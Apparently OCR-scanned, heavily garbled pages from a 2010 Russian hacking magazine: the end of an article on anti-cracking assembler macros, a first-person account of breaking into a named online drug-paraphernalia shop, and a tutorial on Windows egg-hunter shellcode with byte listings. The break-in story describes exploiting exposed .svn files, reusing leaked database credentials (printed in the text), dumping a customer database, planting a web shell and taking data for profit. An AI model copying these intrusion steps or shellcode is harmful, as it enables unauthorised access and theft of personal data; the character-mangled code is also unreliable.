ризЬ екі ; (0x00000006) 



ризЬ екі ; (0x00000006) 
рор е5і 

Іеа еах, [-0х746еЗеЫ1 

пед еЬх 

хог е5 і . еЬх 

Іеа еах, [0x324488441 

ризЬ е4і ; (8x80000007) 



сксз2_зим = о 



Результат работы немного расширенного макроса 



тасго са1с_сгс32 зСаП:, зіге { 

Іосаі Ь,с 
с = Ох^Т^ТТТТТ 
гереаС зіге 

Іоасі Ь ЬуРе Тгот зРагР + %-1 
с = с хог Ь 
гереаР 8 

с = (с ЗІ 1 Г 1) хог (0хесіЬ8832 0 * (с апсі 1)) 



;тоѵ еах, [Рз : 0x30] , поэтому записал таким образом 
РезР еах, еах 
33 @Р+1 

саіі .епб.зідп 
рор еах 
абб еах , 7 
бЬ ОхСб 



епб гереаР 

СКС32_Зим = с хог ОхРРРРРРРР 



пор 

геР 



} 

Хочу заметить, что операции вида іР (огідіпа1_1іаз]т ! = сиггепр_ 
базб) ЕггогО абсолютно бесполезны! Хотя используются повсе- 
местно, даже в крутых протекторах. А вот нечто подобное: 

тоѵ еах,аббгезз + огідіпа1_]таз}і 
зиЬ еах, сиггепР_1іаз]т 
саіі еах 

Совсем другое дело. Двух зайцев сразу: обфускация — динамическое вы- 
числение адреса перехода, и контроль целостности кода, то есть, если код 
был каким-либо образом изменен, будет выполнен переход кот знает куда. 



бЬ 0хЕ9, 0x00, 0x00, 0x00, 0x00 
. епб. зідп: 

еізе ІР ѵагіапР = 1 

;СВ-Сорз II -> Еіпк ВаРа ЗесигіРу 

риз б еЬх 

ризбаб 

тоѵ еЬр , 0x9 09 09 09 0 
Іеа еах, [еЬр-0х70] 

Іеа еЬх, [еЬр-0х70] 

саіі $+5 

Іеа еах, [есх] 

бЬ 0хЕ9 , 0x00 , 0x00 , 0x00 , 0x00 



ОХАССЕОЕ, ИЛИ ОБМАН АНАЛИЗАТОРОВ 

Анализаторы исполняемых файлов вроде РЕЮ используют сигнатур- 
ный поиск, в базе находятся цепочки байт, которые встречаются в 
популярных протекторах\упаковщиках. Для того, чтобы сбить с толку 
взломщиков своей программы, я создал макрос, добавляющий в Епігу 
Роіпі: программы случайную сигнатуру. Воспользовавшись вышеупо- 
мянутым анализатором или его аналогом и получив ложный результат, 
взломщик попытается распаковать программу либо автоматическим 
распаковщиком, либо вручную, следуя описанию. И, конечно же, ниче- 
го не получится, кроме тяжелого ступора. 

тасго 1аске_зідп { 
гапботізе 

ѵагіапб = гпбпит тоб N 
11 ѵаііапі = о 

; РЕ Ргоіесі 0.9 -> Скгізіорк СаЫег 

ризк ебх 

ризіі есх 

ризіі еЬр 

ризк ебі 

бЬ 0x64, 0x67, ОхАІ , 0x30, 0x00 
; ЕАЗМ генерирует длинный формат инструкции 



еізе 11 ѵагіані = N 

} 

0ХАВ105. ЗАКЛЮЧЕНИЕ 

Грамотное использование и комбинирование описанных мною техник 
позволяет сделать серьезную защиту. Это и очень удобно: написав, 
отладив программу, с минимальными правками исходного кода пре- 
вращаем ее в неприступный бастион. После того, как я написал свой 
набор макросов, протестировал и применил их к своей программе, 
мне пришла в голову еще одна замечательная идея. Данный метод 
я еще и автоматизировал следующим способом: поместил на сервер 
исходный код программы и компилятор ЕА5М, при запросе пользо- 
вателем Ігіаі-версии программы она автоматически компилируется; 
таким образом получается, что каждому пользователю выдается 
уникальная версия программы. Универсальные взломщики (патчеры, 
сгаск'и и т.п.) просто бессильны — придется ломать каждую копию 
отдельно. А это ведь непросто, учитывая, что весь код изменен, а не 
как у навесных протекторов, только «сверху». Мне, как разработчику, 
остается только чаще обновлять исходники и совершенно не волно- 
ваться о том, что мою программу могут взломать. Так что, ореп уоиг 
еуез, ореп уоиг тіпб! ^ 



ХАКЕР 08 /139/ 10 



► 0б1 







КУРИТЬ ВР 

Взлом голландского онлайн-смартшопа 



«Хочу в Амстердам!» - с этой мыслью я залез в Гугл в поисках очередной жертвы. 
Среди первых ссылок по запросу «дгоѵѵзНор» оказался магазин агагіиз.пеі 
с характерными зелеными листиками известного растения на главной странице. 
Немного почитав страницу «АЬоиІ Агагіиз», я узнал, что данный сайт - один 
из первых онлайн-магазинов по продаже психоактивных веществ в интернете 
(работает с 1999 года) с огромной базой покупателей и товаров. Поэтому ты 
не удивишься тому, что на одном поверхностном просмотре страниц я не стал 
останавливаться :). 



САЖАЕМ СЕМЕНА 

Итак, первым делом я начал изучать структуру шопа, что, замечу, 
было делом не из приятных, так как использовался апачевский ппос1_ 
геѵѵгііе, и все ссылки имели вид вроде «ЬирУ/агагіиз.пеі/зппагІзЬор/ 
рзусЬесІеІісз/». Поверхностный осмотр мне ничего не дал, гугл не 
показал никаких интересных поддоменов и файлов, а из паблик- 
движков были обнаружены последний ѴѴогсіРгезз [ ЫірѴ/агагіиз.пеІ:/ 
Ыод/ ]. пропатченный рЬрВВ версии 2.0.22 [ ЬирѴ/агагіиз.пеіЛогипп/ 
босз/СНАМОЕІОО.ЫтІ ) и не очень-то уязвимый Ріѵѵік версии 0.5.5 
[ ЫірѴ/ріѵѵік.агагіиз.пеІ: ]. 

Единственным доступным вариантом на тот момент оказался Рі\л/ік с 
его Х55 в форме логина (ссылку на абѵізогу ищи в сносках). Замора- 
чиваться с Х55 мне не очень хотелось, так как это долго и ненадежно, 
так что пришлось размышлять дальше над способом проникновения в 
растаманский рай. 

ПОЛИВАЕМ И УДОБРЯЕМ 

Прошло несколько дней. Совершенно случайно мне на глаза попался 
старый пост с Хабра об уязвимости множества крупных порталов, 
связанной с тем, что их .зѵп-исходники хранились в открытом доступе 
прямо на сервере. Вкратце поясню суть бага. 

Во-первых, 5ѴМ — это система контроля версий, которая является 
продвинутым средством для организации совместной работы десятков 
разработчиков. 



Во-вторых, 5ѴМ совершенно открыто хранит в каждой директории 
проекта свои метафайлы, которые сложены в директорию «.зѵп». В 
данной директории в файле «епігіез» находится список всех файлов и 
директорий, которые расположены в той же самой папке, что и «.зѵп». 
Здесь же находится и информация о расположении репозитория, раз- 
мере файлов, дате их модификации и именах юзеров, работающих над 
проектом. 

Суммируя вышеназванные факты, можно подвести нехитрый итог: 
если проект разрабатывался с помощью 5ѴМ, то, зайдя по адресу 
вроде зЕе.сот/.зѵп/епІгіез, ты сможешь увидеть файловую структуру 
корня сайта со всей перечисленной дополнительной информацией. 

В моем случае таким адресом оказался агагіиз.пеі/.зѵп/епігіез . где 
содержалась инфа вида 

2008-11-18Т10 : 25 : 57 . 0000002 
с58192 0Ьа2(іаса34гЗеб841ас0б1сі958с 

2007- 11-16Т11: Об: 53 .8605152 
935 

аіех 

саСедогу . ріір 
Іііе 

2008- 11-18Т10 : 25 : 57 . 0000002 
7се2е2 3ас9Ьс5б0есЗс2е7 9 0731Ьб3 0сЗЬ 



► 0б2 
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Характерная главная страница смартшопа 



2007-01-04ТІ6 : 03 : 07. 47772 52 

138 

аіех 

Ііпсі. ріір 

Іііе 

2009-05-0ІТІ2 :58:14.0000002 
Ьееа2172 8бб7240с14795сіЗс508а5144 
2009-05-0ІТ09 : 08 : 40 . 7829672 
1307 
аіех 

гесепР . ріір 
Іііе 

СОБИРАЕМ УРОЖАЙ 

Итак, скачав к себе на винт исходники всех РНР-файлов 
проекта из категории «.зѵпАехІ-Ьазе/», я начал кропотли- 
во парсить их на предмет уязвимостей. 

После очень долгих и нудных раскопок я понял, что 
агагіиз.пеі: — действительно очень старый и крупный 
проект, так как в исходниках не было даже намека на 
банальные инклуды, скуль-инъекции и иже с ними. Искать 
что-то извращенное и глубоко спрятанное было лень, 
поэтому я стал думать, как быть. 

Как оказалось, решение было крайне простым и лежало 
практически на поверхности :). На этот раз мне удалось 
продвинуться дальше во взломе с помощью чтения 
конфига форума рЬрВВ по адресу агагіиз.пеіЛогит/.зѵп/ 
ЩхЩЬазе/соттоп.рЬр.зѵп-Ьазе : 

<?р1ір 

$сЗЬтз = 'тузр14'; 



НТТР://ѴѴѴѴѴѴ 



■ 

> Ііпкз 

• ріѵѵік.огд/ 

Ыод/2010/04/ріѵѵік-0- 

б-зесигКѵ-абѵізогѵ/ 

— Ріѵѵік <= 0.5.5 
• Іодіп Рогт Х55 
ЬаЬгаЬаЬг.гц/Ыодз/ 
іпІозесигіІу/70330/ 
-.зѵп бага 

• ЬирзѴАогипп. 
апОсбаНгиЛЬгеасІ- 
паѵ51383-1 -1 0.Ыт І 

— МуЗаі Р5Т/6НС 
Мападег 2.3 

• зпіррег.ги/ѵіеѵѵ/5/ 
тадіс-іпсІисІе-зЬеи/ 

— Мадіс Іпсіибе ВбеО 
3.3.3 



ІЫРО 



> іп^о 

Защититься от 
подключения извне 
к МуЗОІ очень 
просто. Для этого 
зайди в таблицу 
тузді.изег, 
найди там своего 
пользователя 
и проапдейть поле 
Нозі: (если текущее 
его значение равно 
«%», то замени его 
на «Іосаібозі:»). 



0 Мидіп СйиН|іЫ«н 



Редактирование код^плагинов в блоге 
Азариуса 



Тііеге із еіЩіег по іпсіех йоситепЦ ог Сііе 
(ИгесСогу із геасі-ргоЦесСесі. 

[ап еггог оссиггесі ѵ^МІе ргосеззіпд РМз 
сіігесРіѵе] 



Рбртуабтіп'ом здесь даже и не пахло, так что остава- 
лось попробовать удаленно подконнектиться к 3306 порту 
мускула на данном сервере. 

ЗАРЯЖАЕМ БОНГ 

Залив на свой (почти свой :) хост утилиту МуЗОІ В5Т/ 

6НС Мападег, я попробовал залогиниться на серваке БД 
Азариуса с помощью данных из конфига рбрВВ. Как ни 
странно, у меня это получилось (пользуясь случаем, спешу 
напомнить — разрешай коннект к своему мускул-серверу 
только с локалхоста!). 

Далее нужно было немного осмотреться в базе, чем я не- 
медленно и занялся. 

Итак, под текущим юзером были доступны несколько БД: 



іпіогтаРіоп_зс1іета , АіііІіаРе, аіі, агаЬазе 
азаіогит, стз_зузРет, стзЬазе, еприеРе, 
раутепРз, зузіод, зузіодаза, РезС , Ѵ70гсіргезз 



В базе раутепіз была только одна табличка — «Іод», где 
хранились мало чем полезные логи, так что далее я полез 
прямиком в главную БД — агаЬазе. 

Немного цифр: на шопе зарегистрировано 239545 рас- 
таманов и психонавтов, которые сделали 291 187 ордеров. 
База юзеров имела следующие поля: 



$сіЫіозЦ = ' (ЦаСаЬазе . азагіиз . пеД ' ; 

$сіЬпате = 'азаіогит'; 

$сіЬизег = ' ѵ^еЬ_а 2 агіиз ' ; 

$сіЬраззѵ\[сі = ' а2агіизкакі734 ' ; 

$ДаЫе_ргеііх = 'р1ірЬЬ_'; 

йеііпе ( ' РНРВВ_ІЫЗТАШЕВ ' , Дгие) ; 

?> 

Из конфига видно, что мускул-сервер шопа располагается 
по адресу сІаІаЬазе.агагіиз.пеІ и вполне может быть виден 
из веба. 

На 80 НТТР-порту сервера висела следующая надпись: 

[ап еггог оссиггесі ѵ\?М1е ргосеззіпд Дкіз 
сіігесДіѵе] 

Уои сіоп'Д каѵе регтіззіоп До ассезз Дке 
гедиезДесі сіігесДогу. 



ІІзегІВ, ВзегЗДаДизІВ, РігзДВате, 

ВазДВате, Етаіі, ЕтаіІѴегі Діесі, Сотрапу, 
СотрапуВезсгірДіоп , КѴКЫитЬег, 

ВТШЕитЬег, ІпѵоісеАІІоѵ/есі, Кетагк, 

Раззѵ\?огсі, ЕогитІВ, ЕогитАсітіп, 

ЕазДЕодіп, ЕапдІВ, СиггепсуІВ, 

_Виуег_Асісігезз , _Виуег_НозД, _Виуег_АдепД , 
_КІапДсо(іе, _Тиззепѵоедзе1 , _КогДіпд, 
_Раззѵ^ог(іЫеѵ^, _Етаі13епсі, _зеззіоп_ісі, 
_ШеЬзіДе, тосіі Діесі, Ыеѵ^зІеДДег, Ыіскпате 

Слив данную базу и бережно сохранив ее на винт для 
дальнейшей работы, я стал размышлять над тем, как 
залить шелл в уже полюбившийся мне онлайн-притон 
интересных личностей :). 

КУРИМ 

Первым делом я проверил привилегии на работу с файла- 
ми у текущего юзера мускул: 




> ІП^О 

Все описанное 
в статье является 
плодом больного 
воображения автора. 
Любые совпадения 
с существующими 
сайтами случайны. 
Ни редакция, ни 
автор не несут 
ответственности за 
любой возможный 
вред, причиненный 
материалами этой 
статьи. 
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ІМѴ50Ш5Т/СНС Мападег 2.3 



Гйказаѵь все- баіы 
■■■[ азіЬаіл ]■■■ 

<45?045) 
Ёо^аінігаоішр (16) 



БдКлШіаііи} 



Т«агишв;СиЕ*п] 



Бпга спнкИгЭЗі^Зі} 



сап5 




ШегГО ШегБШисІО ИгсШатв ідішшпа БтЫІ 


СсттаіЛЙаІіпд$ (953?^ 
Соттвпі! С4&97) 


е^оекііоооойг 


Ьв-лплгі: ЗопавпеяІ клп«г(:9І№г1нЛ^ійНЬцЦоп'.»тІ 


Свтрлпг (6) 
Счітпсівз [4]^ 


Е8гІСа[С11Л0а9а2 


ЕлппаЛЭ ІапдвпаеІ І»ппаіЛ2фзЬйѵіІалІ | 


ЕхрвіівпевСаіифігіек 
ЕКРвГІргіСИ С4ВР) 
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Тѵтліш 



Мой шелі^а агагіиз.пеі 



Вывести полный список сайтов помогла команда «саі: ,/*|дгер 
ЗегѵегМате»: 



Таблица с пользователями 



ЗЕЬЕСТ 1оасі_^і1е ( ' /е1:с/раззѵ\[(і ' ) 

Здесь все оказалось не так просто, как с 5ѴМ и коннектом к базе 
— файловых привилегий не было вовсе. С заливкой шелла могли 
появиться проблемы, если бы админы шопа создали разных юзе- 
ров для разных БД, но, как ты уже понял, у меня был доступ ко всем 
базам сразу, так что я потихоньку стал колдовать над своим любимым 
ѴѴогбРгезз :). 

Итак, зарегавшись по адресу бирѴ/ѵѵѵѵѵѵ.агагіиг.пеДЫод/ѵѵр-Іодіп. 
рЬр?асбоп^гедІ5І:ег и получив на свое мыло пароль от аккаунта, я по- 
лез в БД под названием ѵѵогбргезз. 

Наверняка ты знаешь, что привилегии пользователей блога хранятся 
в табличке ѵѵр_и5егппе1;а в ключе под названием \л/р_сараЬШбе5. По 
дефолту каждый юзер имеет привилегии подписчика, то есть, факти- 
чески, не имеет никаких привилегий: 



а:Е:Еі1іаСе. ІіегЬаІсіізСгіЬиСіоп . сот 

Ыод . азагіиз . пеС 

сопзсіоиз . п1 

сопзсіоизсігеатз . п1 

(іаСаЬазе . агагіиз . пеС 

сігорзМрріпд . сопзсіоизѵ\[}іо1еза1е . сот 

ті(і(і1еѵ7аге . епРІіеодепісз . сот 

рітруоигЬісусІе . сот 

ріѵ\[ік . агагіиз . пеС 

гесііг . ѵарозкор . сот 

зесиге . агагіиз . пеР 

зРаРз . азагіиз . пеР 

ѵ\?еЬтап . азагіиз . пеР 

ѵ\?еЬтап . ѵарозРюр . сот 

шт . ат.діГІиз . аР 

шш . агагіиз . Ье 

шш . агагіиз . ез 

шш . агагіиз . Рг 

ѵѵѵлл?. азагіиз . пеР 

ѵѵѵлл?. азагіиз . п1 

гесііг . агагіиз . п1 



а : 1 : { з : 10 : " зиЬзсгіЬег " ; Ь : 1 ; } 

Недолго думая, я сделал своего тестового юзера администратором, 
заменив данное значение на следующее: 

а : 1 : { 3 : 13 : " асітіпізРгаРог " ; Ь : 1 ; } 

Став админом, я зашел в админку блога по адресу Ы:І:р://а2агіи5.пеІ:/ 
Ыод/уур-абппіп прямиком в раздел редактирования плагинов. И на 
этот раз мне снова повезло — плагины были доступны для редакти- 
рования, так что мне оставалось только записать свой шелл в плагин 
«НеНо боНу» и активировать файл. 

Теперь мой шелл располагался по адресу Ы:І:р://а2агіи5.пеІ:/ 
Ыод/?а2агіц5 и с удовольствием открывал мне дальнейшие возмож- 
ности для изучения шопа :). 

КУШАЕМ 

Теперь меня заинтересовало следующее: 

1. Исходники магазина; 

2. Админка магазина; 

3. Сайты-соседи. 

С первым пунктом я успешно справился, слив РНР-исходники из 
директории /уаг/уѵуѵуу/ЫтІ/агагіиз/риЫіс/, но, как ни странно, админки 
там не было. 

Долго лазая по файлам и директориям шопа, я так и не нашел ад- 
минку, так что пришлось довольствоваться полным доступом к БД и 
исходниками Азариуса. 

Далее я выполнил команду «[осаіе Ьирб.сопІ» и зашел в директорию / 
еІс/арасЬеЗ/зЬагебсопбд/зТез-епаЫеб/, где хранились конфиги всех 
сайтов текущего сервера. 



. агагіиз . рС 

сопзсіоизѵ^ТюІезаІе . сот 
шш. сгагу-Р-зііігРз . сот 
шш. сиІРоТагсІіа . сот 
епСкеодепісз . сот 
дгеепІаЬеІзеесЗз . сот 
ѵѵѵлл^.тизііхі . п1 
. зкаѵіРа . пеР 
шш . зкгоотзкакег . пек 
зтагРзТюр . п1 

ѵѵѵлл?. Ргаѵеііегздагсіеп. сот 
ѵарозТюр . сот 
ѵ\?ѵлл[. хРепзіоп . п1 

Как видишь, поддоменов у агагіиз.пеі оказалось гораздо больше, чем 
показал Гугл :). Так что, если захочешь повторить хак, это будет тебе 
пищей для размышления. 

Все остальные сайты так или иначе все равно были связаны с травой, 
грибами и прочими интересными штуками, так что я быстренько забрал 
все исходники, все базы, явки и пароли и просто ушел с сервера (ну, не 
совсем просто, а извлекать коммерческий успех из этого добра :). 

отходняк 

Даже если у истоков твоего коммерческого онлайн-проекта стоят 
грамотные кодеры и специалисты по безопасности, то все равно 
советую опасаться банального человеческого фактора. В данном 
взломе к заливке шелла и сливу базы пользователей привели 
несколько случайностей, которые, словно кусочки паззла, сложи- 
лись в адскую мозаику с нарисованным на ней листком марихуа- 
ны. Так что, админ, бди! ^ 



► об4 
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НОВОЕ ЛИЦО КАНАЛА - СМОТРИТЕ В ИЮЛЕ! 



Нас смотрят во всех крупных городах России и в 60 регионах страны 



0 ЭР ТЕЛЕКОМ 



••• 



экэоа 




трмколорглі 







с^шегЬ^ 



4!огШиа^ 



твоетЛ 




ир-апеі: 



реклама 



а также в более 1 00 кабельных сетей РФ 







в последних номерах ][ была написана серия статей по кодингу живучих сплойтов 
с использованием разнообразных методов обхода механизмов защиты в последних 
версиях ѴѴіпбоѵѵз. Чтобы ты был просвещен и чувствовал себя в сплойтостороении 
как рыба в борще, я поведаю кое-что на близкую тему - шеллкодописание. 

А именно: внутренности и технические подробности метода/шеллкода. Имя ему - 
Едд Нипііпд. 



что ТАКОЕ ЕОО Н0МТІМ6? 

По сути иггхантинг представляет собой небольшой по размеру 
шеллкод, цель которого — найти в виртуальной памяти атакуемо- 
го процесса боевой шеллкод и передать ему управление процес- 
сом. Нахождение обеспечивается за счет уникальной последо- 
вательности символов, стоящих перед основным шеллкодом. На 
самом деле, Едд НипТіпд — это один из классических методов, 
используемых в сплойтостроении/шеллкодописании. Исполь- 
зуется он уже давно в тех или иных ситуациях. Лучшей работой 
по данной теме считается статья такого известного человечка 
как зкаре аж от 2003 года [ Ыск.ого/сосіе/зкаре/рарегг/еааЬипІ- 
зЬеЛсосІе.рсЛ ). 

А ЗАЧЕМ ОНО НАМ 

Если просто, то иггхантинг используют в ситуациях, когда основной 
шеллкод не влезает в переполняемый буфер и/или неизвестно, где он 
размещен в памяти. Если непонятно, то поймешь на примере. А если 
с подробностями, то... 

Все мы просматриваем багтрэк, читаем описание уязвимостей, иногда 
закладываем в РоС-сплойты. Большинство из них имеют начинку в 
виде, например, запуска калькулятора или открытия ТСР-порта. То же 
самое относится и ко всякого рода статьям про сплойтостроение, где 
сплойты применяются в лабораторных условиях, а начинка использу- 



ется только для того, чтобы показать, что все получилось. 

В реальной жизни, как ни странно, не все так просто, и функционала 
калькулятора явно не хватает для того, чтобы и в систему въесться, и 
обойти всякие механизмы безопасности, не говоря уж об антивирусах 
и файерволах, и, ктомуже, ограничениях на используемые символы. 
Конечно, во многом выручают зіадесі-шеллкоды, где боевой шеллкод 
попадает в память постепенно, по стадиям. М-м... в общем, иггхант — 
это подвид зІадеб-шеллкода.К примеру, универсальный шеллкод на 
запуск калькулятора — всего 200 байт (а привязанный к конкретной ОС 
и ее адресам — всего 27 байт :)), на бинд — 341 байт. Если добавить 
ограничения на использование \х00\х1Е что вполне обычно, получаем 
227 байт и 368 байт соответственно. 

Если предположить, что мы ограничены БУКВО-циферками: 534, 816. 

В общем, тут все понятно. 

Да и простой бинд порта — неинтересно. К примеру, шеллкод на 
установку туннеля через ВМ5, о котором я писал в рубрике Базу Наск, 
весит аж за 1 000 байт, и это в натуральном виде. 

Что же нам могут предложить эксплойты? Сколько могут вместить в 
себя начинки? По-разному. Счень. 

Это в лабораторных условиях при переполнении буфера мы получаем 
большую, непрерывную, неизмененную область в стеке с полностью 
контролируемым ЕІР. Эх... Кстати, в М5Е к каждому сплойту указы- 
вается размер возможной начинки и запрещенные символы в раз- 



► 066 
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Результат переполнения 



Передача управления за счет перезаписи 5ЕН 
в деле 

деле «Рауіоасі іпіогтаііоп». Например, пп508_067_пе1:арі — 400 байт, 
1;гепсІппісго_5егѵегрго1;ес1; — 800 байт, а размер сплойтов на АсОѵеХ не- 
ограничен, так как боевой шеллкод в куче. Как видишь, далеко не все 
сплойты могут вместить в себя все, что хотелось бы. Что же делать? 

Все зависит от ситуации, но иногда нам помогает техника иггхантинга. 
Иногда — это когда основной шеллкод есть еще где-то в виртуаль- 
ном адресном пространстве процесса. Как его запихнуть туда? Все 
зависит от ПО. Например, для ІЕ 6/7, извращаясь с ява-скриптом, мы 
можем запихнуть основной шелл в кучу или, для ітар-сервера Мегсиг 
Меззадіпд — последовательной отправкой ітар-запросов. 

НОВАЯ ЖИЗНЬ ИГГХАНТИНГА 

Не совсем новая, но... жизнь ведь не стоит на месте, и семейство ОС 
ѴѴіпбоѵѵз обзавелось такими страшными словами как АВЕН, ВаІеВЕН, 
ВЕР, 05 и т.д. Что это для нас значит? Писать сплойты, особенно 
универсальные, стало гораздо, гораздо труднее. Но, конечно, не невоз- 
можно. Раз разработчики используют комплексные меры по защите, 
мы используем комплексные меры по взлому :). Отличным примером 
здесь является ]і1:-зрау шеллкод под ІЕ8, ЕЕ3.6 с обходом ВЕР, А5ЕР 
[ ехрІоіІ-сІЬ.сопп/ехрІоіТз/ІЗбД?/ ). написанный Алексеем Синцовым. В 
этом сплойте он использовал иггхантинг в]і1:-спрее почти единственном 
доступном куске в памяти, которая исполняема. Возможности запихнуть 
в спрей основной шеллкод не было из-за всевозможных ограничений. 

ТЕОРИЯ 

Что собой представляет иггхантинг- шелл код и требования к нему? 

В общем-то, иггхантгинг-шеллкод — это шеллкод минимального разме- 
ра, который может быстро найти в вируальном адресном пространстве 
процесса основной шеллкод и передать ему управление. Иггхантинг 
находит основную начинку по последовательности символов, стоящих 
перед ней. Это так называемый Тад или едд, потому и едд Ьипбпд. Само 
«яйцо» — уникальная четырехбайтовая последовательность символов, 
которая повторяется дважды. Дважды, чтобы избежать коллизий, то 
есть неверных обнаружений иггхантером. К тому же, что это за боевой 
шеллкод, если у него или одно яйцо, или совсем их нету :). 

Основная «трудность» для иггхантера в том, что не все виртуальное 
адресное пространство процесса выделено («существует»). То есть 
существуют невыделенные страницы памяти, попытка обратиться к 
которым вызовет ошибку ассезз ѵіоіабоп, и программа тупо вылетит. 
Во-вторых, начинка находится неизвестно где, поэтому доступные 
страницы приходится побайтово перебирать. Существует три (с по- 
ловиной) основных техники организации иггхантинга под семейство 
ѴѴіпсІоѵѵз. Общий алгоритм у них похож: иггхантер проверяет адреса 
памяти на возможность доступа и, при положительном результате, 
побайтово сравнивает память для поиска тега. Разница заключается в 
реализации. 



МТ0І8РІАУЗТРШБ / МТАССЕ88СНЕСКАМ0АУ0ІТАІАКМ 

Это основная (с половиной :)) техника. Она заключается в использо- 
вании системного вызоваізузіет саЕ) МЮізрІауЗігіпд для проверки 
доступа к странице памяти. Вид вызова: 

ЫТЗУЗАРІ ЫТЗТАТиЗ ЫТАРІ ЫСВізрІауЗСгіпд ( 

ІЫ РиЫІСОВЕ_ЗТКІЫС ЗСгіпд 

) ; 

Вообще, вызов производится за счет прерывания: в ЕАХ указывается, 
какой вызов произвести, а в остальных регистрах — аргументы к нему. 
В данном случае адрес, к которому мы пытаемся получить до- 
ступ, лежит в регистре ЕВХ. Ответ функции попадает в ЕАХ и равен 
ОхсООООООб, если доступ к странице вызовет Ассезз Ѵіоіабоп. Для по- 
байтового сравнения используется оператор зсабз, который оперирует 
с нашим тэгом (едд) в ЕАХ и адресом из ЕОІ. 

Общий вид шеллкода и его подробное описание: 



00000000 


6681САЕЕ0Е 


ог (Цх, 0x111 


00000005 


42 


іпс есіх 


ОООООООб 


52 


ризіі ейх 


00000007 


6А43 


ризіі Ьуіе +0x43 


00000009 


58 


рор еах 


ОООООООА 


СВ2Е 


ІПІ 0х2е 


ооооооос 


ЗС05 


стр а1 , 0x5 


ОООООООЕ 


5А 


рор есіх 


ОООООООЕ 


74ЕЕ 


3 2 0x0 


00000011 


В890509050 


тоѵ еах, 0x77303074 


00000016 


8ВЕА 


тоѵ есіі , есіх 


00000018 


АЕ 


зсазсі 


00000019 


7 5ЕА 


ЗП 2 0x5 


0000001В 


АЕ 


зсазсі 


0000001С 


75Е7 


ЗП 2 0x5 


0000001Е 


ЕЕЕ7 


зтр есіі 



Итак, первые две строчки выравнивают ЕОХ под начало страницы 
памяти. Размер минимальной страницы равен 10006 в х86, поэтому мы 
проверяем адрес, и, если его нет, переходим к следующей странице. 
Таким образом, сначала мы меняем последние три байта ЕВХ на ЕРЕ, 
а потом инкриминируем, что в итоге дает нам выравнивание по 10006. 
После, при джампах, мы увеличиваем значение ЕОХ либо на 1 6 (см. 
строки 00000019, 0000001 С), либо до следующей страницы, то есть на 
10006 (см. ОООООООЕ). 

Далее мы кладем ЕОХ в стек, чтобы сохранить значение, так как реги- 
стры меняют свои значения при вызове функции. 

Следующие две команды перемещают в ЕАХ 0x436. Этим мы ука- 
зываем, что надо запустить именно функцию МіОізрІауЗігіпд. іпі; 2е 
делает системный вызов. Результат, как уже говорилось, попадает в 
ЕАХ. Его младшие байты мы сравниваем с 0x5 и при положительном 
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0Ѳ12ГББР ЭѲ 
0Ѳ12РВЕВ 90 
ип:іі2РЕЕі: аз&43Е Ѳ1 

ббіЗІСД РР0Р 



О0іггерз 

ѳѳігрвр? 

ѲѲ13РВР9 

0Ѳ12ГВРЙ 

0012РВРС 

ѲѲ12ГВРЕ 

ѲѲ12РВРР 

00іггс0і 

0012РС06 

00ігрс0е 

0Ѳ13РСѲ9 

Ѳ012РСѲВ 

0Ѳ13РСѲС 
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Ищем наш шеллкод и изменения в нем 



ЕддИипІег в действии 



результате (то есть, ассезз ѵіоіаііоп) прыгаем в начало шеллкода для 
перехода на следующую страницу. Перед этим, конечно, вынимаем 
ЕОХ из стека. 

Далее идет побайтовое сравнение. Здесь 0x77303074 — это тэг (может 
быть «любой», тут — «ѵѵООі:»), который должен находиться перед основ- 
ным шеллкодом. Его мы помещаем в ЕАХ, а в ЕОІ помещаем адрес 
из ЕОХ. 5СА50 сравнивает значение из ЕАХ с тем, что находится по 
адресу в ЕОІ. В случае неудачи мы перемещаемся обратно на вторую 
строчку шеллкода, где значение ЕОХ увеличивается на единицу, а 
остальное повторяется заново. 

Повторное использование 5СА50 требуется, чтобы еще раз найти тэг 
сразу после первого. При использовании оператора 5СА50 указатель 
на память в ЕОІ сдвигается, поэтому мы сразу прыгаем в начало на- 
шего основного шеллкода, используя ]ппр ебі. 

Почему же я упомянул какую-то половинку в паре абзацев 
выше? Да это к тому, что вместо описанной зкаре’ом функции 
МЮізрІауЗігіпд можно использовать более позднюю придумку — 
МіАссеззСбескАпбАибііАІагт. Фактически разница в коде будет лишь 
в номере вызываемой функции. 

Вместо для МЮізрІауЗФіпд: 

00000007 6А43 ризіі ЬуДе +0x43 

Должно быть для МіАссеззСбескАпбАибііАІагпп: 

00000007 6А02 ризіі ЬуОе +0x2 

Бонус от использования МіАссеззСбескАпбАибііАІагт в «постоянст- 
ве». Смещение(0х43б), которое используется для вызова системной 
функции для МШізрІауЗФіпд вроде как меняется в последних версиях 
ОС. 

ІЗВАОРЕАОРТР 

Эта техника использует стандартную АРІ-функцию для проверки до- 
ступа к виртуальной памяти. 

Вид функции следующий: 

ВООЬ ІзВасЗКеасіРЦг ( 

сопзР ѴОІВ* 1р, 

ПІЫТ_РТК исЬ 

) ; 

То есть, нам требуется при вызове функции данные передавать через 
стек. 

Логика работы этой техники аналогична предыдущей, поэтому лишь 
кратко пробегусь по коду. 



00000000 


ззвв 


хог еЬх , еЬх 


00000002 


6681СВРР0Р 


ог Ьх, 0x1 ТТ 


00000007 


43 


іпс еЬх 


00000008 


6А08 


ризіі ЬуРе +0x8 


ОООООООА 


53 


ризіі еЬх 


ооооооов 


В80В5ВР777 


тоѵ еах, 0х77е75Ь0сі 


00000010 


РРВО 


саіі еах 


00000012 


85С0 


ІезР еах, еах 


00000014 


75РС 


ЗП 2 0x2 


00000016 


В890509050 


тоѵ еах, 0x77303074 


0000001В 


8ВРВ 


тоѵ есіі , еЬх 


0000001В 


АР 


зсазсі 


0000001Е 


75Р7 


ЗП 2 0x7 


00000020 


АР 


зсазсі 


00000021 


75Р4 


ЗП 2 0x7 


00000023 


РРР7 


зтр есіі 



Первые три строчки — выравнивание ЕВХ под размер страницы и 
побайтовый проход по доступной памяти. Далее складываем аргу- 
менты к функции, где 0x86 — исЬ-аргумент, а ЕВХ — проверяемый 
адрес в памяти. В ЕАХ запихиваем адрес ІзВабВеабРіг в виртуаль- 
ной памяти процесса. Это самый большой недостаток данной тех- 
ники, так как положение функции будет меняться в зависимости от 
версии, сервис-пака, языка системы, не говоря уж о рандомизации 
пространства. Если значение в ЕАХ не равно нулю, то происходит 
переход к следующей странице памяти. Остальная часть кода анало- 
гична предыдущей технике. 

Последняя техника основывается на использовании 5ЕН, но я тебе о 
ней не расскажу, так как и получаемый иггхантер большой по размеру 
(60 байт), и, главное, начиная с ХР 5Р2 для ее эксплуатации приходит- 
ся обходить защиту ЗЕН'а, что делает ее в большинстве случаев не 
юзабельной. 

